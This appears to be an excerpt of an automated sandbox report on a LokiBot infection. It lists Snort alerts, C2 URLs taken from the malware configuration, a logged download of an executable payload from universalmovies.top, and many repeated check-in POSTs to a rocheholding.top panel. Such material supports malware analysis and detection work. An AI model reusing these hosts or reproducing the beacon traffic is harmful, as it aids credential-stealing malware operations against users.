Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49260 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49260 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49260 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49261 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49261 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49261 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49261 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49261 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49262 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49262 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49262 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49262 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49262 -> 188.114.96.3:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: rocheholding.top/evie3/five/fre.php

Source: Joe Sandbox View	IP Address: 188.114.96.9 188.114.96.9
Source: Joe Sandbox View	IP Address: 188.114.96.9 188.114.96.9
Source: Joe Sandbox View	IP Address: 104.21.74.191 104.21.74.191
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic	HTTP traffic detected: GET /sharonzx.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: universalmovies.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close

Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe

Code function: 21_2_00404ED4 recv,

21_2_00404ED4

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D64B8BBB-F7FA-4868-BA26-522FB5F8B8BC}.tmp

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /sharonzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: universalmovies.topConnection: Keep-Alive

Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: universalmovies.top
Source: global traffic	DNS traffic detected: DNS query: rocheholding.top

Source: unknown

